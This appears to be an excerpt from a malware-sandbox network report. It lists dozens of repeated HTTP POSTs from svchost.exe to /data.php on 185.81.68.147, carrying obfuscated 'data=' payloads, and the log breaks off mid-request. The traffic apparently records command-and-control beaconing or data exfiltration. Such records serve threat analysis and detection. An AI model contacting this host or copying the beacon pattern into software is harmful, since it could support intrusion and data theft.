                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:04.727689028 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:04 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      54192.168.2.549861185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:03.293715954 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:05.035442114 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:04 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      55192.168.2.549865185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:04.950366974 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:06.509358883 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:06 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      56192.168.2.549867185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:05.566497087 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:07.269310951 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:06 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      57192.168.2.549870185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:06.994982958 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      58192.168.2.549872185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:07.407731056 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:08.959208965 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:08 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      59192.168.2.549873185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:07.420768976 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:09.094125986 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:08 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      60192.168.2.549877185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:09.188363075 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:10.726748943 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:10 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      61192.168.2.549878185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:09.351874113 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:11.090454102 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:10 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      62192.168.2.549883185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:11.004524946 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:12.544676065 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:12 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      63192.168.2.549885185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:11.346647978 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:13.100769997 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:12 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      64192.168.2.549888185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:12.779933929 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      65192.168.2.549891185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:13.403824091 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:15.076216936 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:14 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      66192.168.2.549892185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:13.491806030 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:15.002361059 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:14 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      67192.168.2.549897185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:15.236013889 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:16.922410011 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:16 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      68192.168.2.549898185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:15.320031881 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:17.032521009 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:16 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      69192.168.2.549903185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:17.153142929 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:18.703666925 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:18 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      70192.168.2.549904185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:17.272466898 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:18.929557085 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:18 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      71192.168.2.549909185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:18.946805000 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:20.548573017 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:20 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      72192.168.2.549910185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:19.160533905 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:20.906558037 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:20 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      73192.168.2.549915185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:21.230936050 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
